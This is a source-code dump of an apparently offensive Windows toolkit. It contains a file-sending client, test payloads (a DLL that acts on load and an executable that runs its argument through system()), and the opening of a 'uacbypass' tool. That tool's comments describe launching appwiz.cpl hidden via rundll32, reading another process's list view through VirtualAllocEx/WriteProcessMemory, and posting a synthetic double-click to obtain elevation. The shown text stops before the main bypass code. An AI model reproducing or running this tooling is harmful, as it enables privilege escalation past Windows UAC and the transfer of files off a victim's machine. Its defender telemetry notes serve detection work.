-------------------------------------------------------------------------------- /rundll32/lang/ro-RO.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/ro-RO.rc -------------------------------------------------------------------------------- /rundll32/lang/ru-RU.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/ru-RU.rc -------------------------------------------------------------------------------- /rundll32/lang/sk-SK.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/sk-SK.rc -------------------------------------------------------------------------------- /rundll32/lang/th-TH.rc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/th-TH.rc -------------------------------------------------------------------------------- /rundll32/lang/uk-UA.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smb01/CPPTools/9bb1f7e446da79795cf12669b9a2a23f6323aa61/rundll32/lang/uk-UA.rc -------------------------------------------------------------------------------- /rundll32/resource.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #define RC_STRING_MAX_SIZE 200 4 | #define IDS_DllNotLoaded 100 5 | #define IDS_MissingEntry 101 6 | 7 | /* EOF */ 8 | -------------------------------------------------------------------------------- /rundll32/rsrc.rc: -------------------------------------------------------------------------------- 1 | #include 2 | #include "resource.h" 3 | 4 | LANGUAGE LANG_NEUTRAL, SUBLANG_NEUTRAL 5 | 6 | #include "lang/bg-BG.rc" 7 | #include "lang/cs-CZ.rc" 8 | #include "lang/de-DE.rc" 9 | #include "lang/el-GR.rc" 10 | #include "lang/en-US.rc" 11 | #include "lang/es-ES.rc" 12 | #include "lang/fr-FR.rc" 13 | #include "lang/hu-HU.rc" 14 | #include "lang/id-ID.rc" 15 | #include "lang/it-IT.rc" 16 | #include "lang/lt-LT.rc" 17 | #include "lang/no-NO.rc" 18 | #include "lang/nl-NL.rc" 19 | #include "lang/pl-PL.rc" 20 | #include "lang/pt-BR.rc" 21 | #include "lang/ro-RO.rc" 22 | #include "lang/ru-RU.rc" 23 | #include "lang/sk-SK.rc" 24 | #include "lang/th-TH.rc" 25 | #include "lang/uk-UA.rc" 26 | -------------------------------------------------------------------------------- /rundll32/rundll32.rc: -------------------------------------------------------------------------------- 1 | /* $Id: rundll32.rc 24949 2006-11-28 21:20:25Z janderwald $ */ 2 | 3 | #include 4 | #define REACTOS_STR_FILE_DESCRIPTION "Run a 
DLL as an App\0" 5 | #define REACTOS_STR_INTERNAL_NAME "rundll32\0" 6 | #define REACTOS_STR_ORIGINAL_FILENAME "rundll32.exe\0" 7 | //#include 8 | 9 | #include "rsrc.rc" 10 | -------------------------------------------------------------------------------- /rundll32/rundll32.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {4005499D-84AD-4A74-9EF3-FB137EB54633} 23 | Win32Proj 24 | rundll32 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Windows 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Windows 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /rundll32/rundll32.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  
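2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Resource Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /sendfile/sendfile.c: --------------------------------------------------------------------------------
/*
 * sendfile: connect to <host:port>, send the base name of a local file, wait
 * for a two-byte "OK" reply, then send the file contents.
 *
 * NOTE(review): the exchange has no length prefix, no authentication, no
 * encryption and no integrity check. The "OK" reply is only an
 * acknowledgement (the "auth failed" message below notwithstanding), and the
 * payload crosses the network in clear text. Whatever receives this stream
 * should treat the file name as untrusted input.
 *
 * NOTE(review): the header names on this file's #include lines were lost when
 * the page was extracted. The list below is the set of headers the code in
 * this file uses; winsock2.h has to precede windows.h.
 *
 * NOTE(review): file paths are passed as char* to the TCHAR file APIs, which
 * presumably assumes an ANSI (MultiByte) build -- TODO confirm.
 */
#include <winsock2.h>
#include <windows.h>
#include <shlwapi.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "ws2_32.lib")


/* Print the command-line synopsis to stderr and terminate with a failure code. */
void show_usage_and_exit(const char *prog)
{
    /* argv[1] is parsed as host:port and argv[2] is the file to send (see main). */
    fprintf(stderr, "Usage: %s <host:port> <file>\n", prog);
    exit(EXIT_FAILURE);
}

/*
 * Split "host:port" into its two parts.
 *
 * str   - text to parse; must be exactly host, ':' and a decimal port.
 * host1 - optional output buffer for the host; the caller must supply at
 *         least 200 bytes (the host is limited to 199 characters here).
 * port1 - optional output for the port number.
 *
 * Returns the number of characters consumed (the whole string) on success and
 * 0 on any parse error. The outputs are written only on success.
 */
int ns_parse_address(const char *str, char* host1, int* port1)
{
    unsigned int port = 0;      /* initialised: sscanf leaves it untouched on a mismatch */
    int len = 0;
    char host[200] = { 0 };

    if (str == NULL)
        return 0;
    if (sscanf(str, "%199[^ :]:%u%n", host, &port, &len) != 2)
        return 0;
    /* 1..65535 is the usable TCP port range; trailing text makes the input invalid. */
    if (port == 0 || port > 0xffff || str[len] != '\0')
        return 0;

    if (port1)
        *port1 = (int)port;
    if (host1)
        strcpy(host1, host);
    return len;
}

/*
 * Return the low 32 bits of the size of pstrFile.
 *
 * Returns (DWORD)-1 when the file cannot be opened; GetFileSize reports its
 * own failure with the same value (INVALID_FILE_SIZE). The high part of the
 * size is not requested, so files of 4 GiB and more are not represented.
 */
DWORD GetFileSize2(LPCTSTR pstrFile)
{
    DWORD dwFileSize;
    HANDLE hFile = CreateFile(pstrFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
        return (DWORD)-1;
    dwFileSize = GetFileSize(hFile, NULL);
    CloseHandle(hFile);
    return dwFileSize;
}

/*
 * Read exactly ulSize bytes from the start of lpstrFilePath into lpBuffer.
 *
 * Returns TRUE only when the file exists and the full ulSize bytes were read.
 */
BOOL ReadFile2(LPCTSTR lpstrFilePath, LPVOID lpBuffer, ULONG ulSize)
{
    DWORD dwRead = 0;
    BOOL ok;
    /* OPEN_EXISTING: a reader must not create an empty file when the path is wrong. */
    HANDLE hFile = CreateFile(lpstrFilePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
        return FALSE;
    ok = ReadFile(hFile, lpBuffer, ulSize, &dwRead, NULL);
    CloseHandle(hFile);
    /* A short read means the buffer is only partly filled; report it as a failure. */
    return ok && dwRead == ulSize;
}

/*
 * Receive up to len bytes from s, waiting at most sec seconds for data.
 *
 * On timeout (or a select error) this prints "timeout", closes the socket and
 * terminates the process. Otherwise it returns what recv() returns, with the
 * Winsock error code of that recv() preserved for the caller.
 */
int recv_timeout(SOCKET s, char* buf, int len, int sec)
{
    fd_set fdSet;
    struct timeval time;
    u_long mode = 1;
    int n, err;

    ioctlsocket(s, FIONBIO, &mode);
    time.tv_sec = sec;
    time.tv_usec = 0;
    FD_ZERO(&fdSet);
    FD_SET(s, &fdSet);
    if (select((int)s + 1, &fdSet, NULL, NULL, &time) <= 0)
    {
        printf("timeout\n");
        closesocket(s);
        exit(EXIT_FAILURE);
        return 0;
    }
    n = recv(s, buf, len, 0);
    err = WSAGetLastError();

    /* Back to blocking mode so that a later send() of a large buffer is not
       cut short with WSAEWOULDBLOCK. */
    mode = 0;
    ioctlsocket(s, FIONBIO, &mode);
    WSASetLastError(err);
    return n;
}

/* Send all len bytes of data; returns len, or SOCKET_ERROR on the first failed send(). */
static int send_all(SOCKET s, const char *data, int len)
{
    int done = 0;
    while (done < len)
    {
        int n = send(s, data + done, len - done, 0);
        if (n == SOCKET_ERROR)
            return SOCKET_ERROR;
        done += n;
    }
    return done;
}

/*
 * Usage: sendfile <host:port> <file>
 *
 * Returns EXIT_SUCCESS after the whole file has been handed to the socket and
 * EXIT_FAILURE on any error.
 */
int main(int argc, char** argv)
{
    struct sockaddr_in addr;
    struct hostent* hostent = NULL;
    SOCKET s = INVALID_SOCKET;
    WSADATA wsa;

    char host[200] = { 0 };
    int port = 0;
    char* filename = NULL;
    char* buf = NULL;
    char ok[3] = { 0 };
    int bufLen = 0;
    int rc = EXIT_FAILURE;

    if (argc != 3)
        show_usage_and_exit(argv[0]);

    /* Reject a malformed address instead of connecting with port 0 and an empty host. */
    if (ns_parse_address(argv[1], host, &port) == 0)
        show_usage_and_exit(argv[0]);

    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
    {
        printf("WSAStartup failed\n");
        return EXIT_FAILURE;
    }

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET)
    {
        printf("socket failed with error: %ld\n", (long)WSAGetLastError());
        goto cleanup;
    }

    /* gethostbyname returns NULL for an unknown host; the result must be an IPv4 address. */
    hostent = gethostbyname(host);
    if (hostent == NULL || hostent->h_addrtype != AF_INET || hostent->h_addr_list[0] == NULL)
    {
        printf("gethostbyname failed with error: %ld\n", (long)WSAGetLastError());
        goto cleanup;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons((u_short)port);
    memcpy(&addr.sin_addr, hostent->h_addr_list[0], sizeof(addr.sin_addr));

    if (connect(s, (SOCKADDR *)&addr, sizeof(addr)) == SOCKET_ERROR)
    {
        printf("connect failed with error: %ld\n", (long)WSAGetLastError());
        goto cleanup;
    }

    /* Only the base name goes on the wire, not the local directory path. */
    filename = PathFindFileName(argv[2]);

    if (send_all(s, filename, (int)strlen(filename)) == SOCKET_ERROR)
    {
        printf("send failed with error: %ld\n", (long)WSAGetLastError());
        goto cleanup;
    }

    if (recv_timeout(s, ok, 2, 3) == SOCKET_ERROR)
    {
        printf("recv failed with error: %ld\n", (long)WSAGetLastError());
        goto cleanup;
    }

    /* ok[] starts zeroed, so a short or empty reply fails this comparison. */
    if (ok[0] != 'O' || ok[1] != 'K')
    {
        printf("auth failed\n");
        goto cleanup;
    }

    /* A size of 2 GiB or more, and the (DWORD)-1 error value, turn negative here. */
    bufLen = (int)GetFileSize2(argv[2]);
    if (bufLen < 0)
    {
        printf("GetFileSize failed with error: %ld\n", (long)GetLastError());
        goto cleanup;
    }

    /* malloc(0) may return NULL, so an empty file still gets a one-byte buffer. */
    buf = malloc(bufLen > 0 ? (size_t)bufLen : 1);
    if (buf == NULL)
    {
        printf("malloc failed\n");
        goto cleanup;
    }

    if (!ReadFile2(argv[2], buf, (ULONG)bufLen))
    {
        printf("ReadFile failed with error: %ld\n", (long)GetLastError());
        goto cleanup;
    }

    if (send_all(s, buf, bufLen) == SOCKET_ERROR)
    {
        printf("send failed with error: %ld\n", (long)WSAGetLastError());
        goto cleanup;
    }

    printf("send ok\n");
    rc = EXIT_SUCCESS;

cleanup:
    /* Single exit path: the buffer and the socket are released on every error too. */
    free(buf);
    if (s != INVALID_SOCKET)
        closesocket(s);
    WSACleanup();
    return rc;
}

-------------------------------------------------------------------------------- /sendfile/sendfile.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {715D2472-A330-4821-BD4C-3A0844D3A547} 23 | 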
Win32Proj 24 | sendfile 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /sendfile/sendfile.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /testdll/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 
#include

// Exported entry "test": shows a message box with the text "test". It gives a
// caller that resolves and calls the export a visible sign that the call ran.
extern "C" __declspec(dllexport) void test()
{
    MessageBox(NULL, _T("test"), NULL, 0);
}

// Loader entry point. Shows a "DllMain" message box when the DLL is mapped
// into a process and does nothing for the thread and detach notifications.
//
// NOTE(review): MessageBox is a user32 call made while the loader lock is
// held, which Microsoft's DllMain guidance advises against; tolerable only
// because this is a throwaway test payload.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
        MessageBox(NULL, _T("DllMain"), NULL, 0);

    return TRUE;
}
-------------------------------------------------------------------------------- /testdll/testdll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8} 23 | Win32Proj 24 | testdll 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | DynamicLibrary 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | DynamicLibrary 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | 
Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /testdll/testdll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /testexe/testexe.cpp: --------------------------------------------------------------------------------
#include
#include

// Test executable: when started with exactly one argument, hands that argument
// to system(), i.e. to the command interpreter, and waits for it to finish.
// With any other argument count it does nothing. The exit code is always 0;
// the result of system() is not inspected.
int main(int argc, char* argv[])
{
    const bool haveCommand = (argc == 2);
    if (haveCommand)
    {
        system(argv[1]);
    }
    return 0;
}
-------------------------------------------------------------------------------- /testexe/testexe.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {5410031F-4456-4538-8B90-D2D21C75CE97} 23 | Win32Proj 24 | testexe 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | 
true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | MultiThreaded 120 | 121 | 122 | Console 123 | true 124 | true 125 | false 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | MultiThreaded 138 | 139 | 140 | Console 141 | true 142 | true 143 | false 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | -------------------------------------------------------------------------------- /testexe/testexe.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /uacbypass/appinfo.cpp: --------------------------------------------------------------------------------
#include "appinfo.h"


// Reads one string value from the subkey lpszAppName of hKey.
//
// hKey             - open parent key (the Uninstall key in this file's caller).
// lpszAppName      - name of the per-application subkey.
// lpszKeyValueName - name of the value to read.
// strKeyValue      - receives the data; left untouched unless a REG_SZ or
//                    REG_EXPAND_SZ value was read.
//
// Returns 0 when the value was read, is missing, or has another type, and -1
// when the subkey cannot be opened or a query fails for any other reason.
int _GetAppInfoA_(HKEY hKey, LPSTR lpszAppName, LPCSTR lpszKeyValueName, string& strKeyValue)
{
    HKEY hAppKey;
    int ret = RegOpenKeyExA(hKey, lpszAppName, 0, KEY_READ, &hAppKey);
    if (ret != ERROR_SUCCESS)
        return -1;

    // First query with a NULL buffer: only the type and the data size come back.
    DWORD dwType = REG_SZ;
    DWORD cbData = 0;
    ret = RegQueryValueExA(hAppKey, lpszKeyValueName, NULL, &dwType, NULL, &cbData);
    if (ret != ERROR_SUCCESS)
    {
        RegCloseKey(hAppKey);
        return (ret == ERROR_FILE_NOT_FOUND) ? 0 : -1;
    }

    if (dwType != REG_SZ && dwType != REG_EXPAND_SZ)
    {
        RegCloseKey(hAppKey);
        return 0;
    }

    // One extra zeroed byte so the data is terminated even if the stored
    // string is not.
    LPSTR pszData = new char[cbData + 1];
    memset(pszData, 0, cbData + 1);
    ret = RegQueryValueExA(hAppKey, lpszKeyValueName, NULL, &dwType, (LPBYTE)pszData, &cbData);
    if (ret != ERROR_SUCCESS)
    {
        delete[] pszData;
        RegCloseKey(hAppKey);
        return -1;
    }

    strKeyValue = pszData;
    delete[] pszData;
    RegCloseKey(hAppKey);
    return 0;
}

// Enumerates the subkeys of HKEY_LOCAL_MACHINE\lpszSubKey and appends one
// ApplicationInfoA per subkey to vAppInfo, filled from the values
// DisplayName, Publisher, Version, DisplayVersion, InstallLocation and
// UninstallString. Failures of the individual value reads are ignored.
//
// Returns 0 on success and -1 when the key cannot be opened, queried or
// enumerated; entries appended before an enumeration failure stay in vAppInfo.
//
// NOTE(review): the vector's element type was stripped from this page by the
// extraction; the push_back below shows it is ApplicationInfoA.
int GetAllInstalledAppInfoA(LPCSTR lpszSubKey, vector& vAppInfo)
{
    HKEY hKey = NULL;
    int ret = RegOpenKeyExA(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_READ, &hKey);
    if (ret != ERROR_SUCCESS)
        return -1;

    DWORD dwSubKeysCnt;
    DWORD dwMaxSubKeyNameLen;
    DWORD dwKeyValueCnt;
    DWORD dwMaxKeyValueNameLen;
    DWORD dwMaxKeyValueDataLen;

    ret = RegQueryInfoKey(hKey, NULL, NULL, NULL, &dwSubKeysCnt, &dwMaxSubKeyNameLen, NULL, &dwKeyValueCnt, &dwMaxKeyValueNameLen, &dwMaxKeyValueDataLen, NULL, NULL);
    if (ret != ERROR_SUCCESS)
    {
        RegCloseKey(hKey);
        return -1;
    }

    // One name buffer, sized for the longest subkey name, reused per iteration.
    const DWORD cchNameBuf = dwMaxSubKeyNameLen + 1;
    LPSTR pszName = new char[cchNameBuf];
    DWORD dwNameLen = cchNameBuf;

    for (DWORD dwIndex = 0; dwIndex < dwSubKeysCnt; ++dwIndex)
    {
        dwNameLen = cchNameBuf;
        memset(pszName, 0, cchNameBuf);

        ret = RegEnumKeyExA(hKey, dwIndex, pszName, &dwNameLen, NULL, NULL, NULL, NULL);
        if (ret != ERROR_SUCCESS)
        {
            RegCloseKey(hKey);
            delete[] pszName;
            return -1;
        }

        ApplicationInfoA appInfo;
        appInfo.strName = pszName;
        _GetAppInfoA_(hKey, pszName, "DisplayName", appInfo.strDisplayName);
        _GetAppInfoA_(hKey, pszName, "Publisher", appInfo.strPublisher);
        _GetAppInfoA_(hKey, pszName, "Version", appInfo.strVersion);
        _GetAppInfoA_(hKey, pszName, "DisplayVersion", appInfo.strDisplayVersion);
        _GetAppInfoA_(hKey, pszName, "InstallLocation", appInfo.strInstallLocation);
        _GetAppInfoA_(hKey, pszName, "UninstallString", appInfo.strUninstallString);
        vAppInfo.push_back(appInfo);
    }

    delete[] pszName;
    RegCloseKey(hKey);
    return 0;
}
-------------------------------------------------------------------------------- /uacbypass/appinfo.h: --------------------------------------------------------------------------------
// NOTE(review): the header names on the #include lines and the vector element
// type were stripped from this page by the extraction.
#include
#include
#include

using namespace std;

// One entry of an Uninstall registry key, as read by GetAllInstalledAppInfoA.
struct ApplicationInfoA
{
    string strName;             // subkey name
    string strDisplayName;      // "DisplayName" value
    string strPublisher;        // "Publisher" value
    string strVersion;          // "Version" value
    string strDisplayVersion;   // "DisplayVersion" value
    string strInstallLocation;  // "InstallLocation" value
    string strUninstallString;  // "UninstallString" value
};

int _GetAppInfoA_(HKEY hKey, LPSTR lpszAppName, LPCSTR lpszKeyValueName, string& strKeyValue);
int GetAllInstalledAppInfoA(LPCSTR lpszSubKey, vector& vAppInfo);
-------------------------------------------------------------------------------- /uacbypass/uacbypass.cpp: --------------------------------------------------------------------------------
// What this program does, as far as the code below shows: it opens the
// "Programs and Features" list through rundll32, locates the list-view control
// inside that window, reads the entry names out of the process that owns the
// control, and then either prints them next to their registry uninstall
// commands (-list) or posts a synthetic double-click to one entry (-exp N).
// Whether anything runs elevated as a result is decided by the shell and the
// entry that is clicked, not by code in this file.
//
// NOTE(review), defender view: the behaviour that is observable from outside
// the process is
//   - a child started with WinExec and SW_HIDE whose command line is
//     "rundll32.exe shell32.dll Control_RunDLL appwiz.cpl 2",
//   - OpenProcess(PROCESS_ALL_ACCESS) on the process owning the list view,
//     followed by VirtualAllocEx / WriteProcessMemory / ReadProcessMemory,
//   - mouse-button window messages posted to another process's window.
// Process-creation command lines and cross-process handle/memory access are
// the telemetry points to look at for this pattern.
//
// NOTE(review): the header names on the #include lines were stripped from this
// page by the extraction.
#include
#include
#include
#include
#include
#include "appinfo.h"
#pragma comment(lib, "Shlwapi.lib")

#define MAX_BUF 260

// One row of the list view; only Vulnerable and DisplayName are written in
// this file.
typedef struct
{
    BOOL Vulnerable;
    WCHAR DisplayName[MAX_BUF];
    WCHAR UninstallString[MAX_PATH];
}UninstallItem, *pUninstallItem;

// Converts a NUL-terminated wide string to the ANSI code page (CP_ACP).
// Returns a malloc'ed buffer that the caller owns.
LPSTR Unicode2Ansi(LPCWSTR lpWideCharStr)
{
    // With a zero-length output buffer the call returns the size needed,
    // terminator included.
    int cbAnsi = WideCharToMultiByte(CP_ACP, 0, lpWideCharStr, -1, NULL, 0, NULL, NULL);
    LPSTR pszAnsi = (LPSTR)malloc(cbAnsi + 1);
    memset(pszAnsi, 0, cbAnsi + 1);
    WideCharToMultiByte(CP_ACP, 0, lpWideCharStr, -1, pszAnsi, cbAnsi, NULL, NULL);
    return pszAnsi;
}

// Walks down a chain of child windows: starting at OutmostWindow, finds a
// child of class ClassNames[0], then inside it a child of class ClassNames[1],
// and so on. Each level is retried without delay until it exists, so the call
// does not return while a level is missing. Returns the innermost window, or
// NULL when ClassCount is 0.
HWND FindNestedWindowFromClassName(HWND OutmostWindow, PWCHAR *ClassNames, DWORD ClassCount)
{
    HWND hParent = OutmostWindow;
    HWND hChild = NULL;
    for (DWORD level = 0; level < ClassCount; level++)
    {
        do
        {
            hChild = FindWindowEx(hParent, NULL, ClassNames[level], NULL);
        } while (hChild == NULL);
        hParent = hChild;
    }
    return hChild;
}

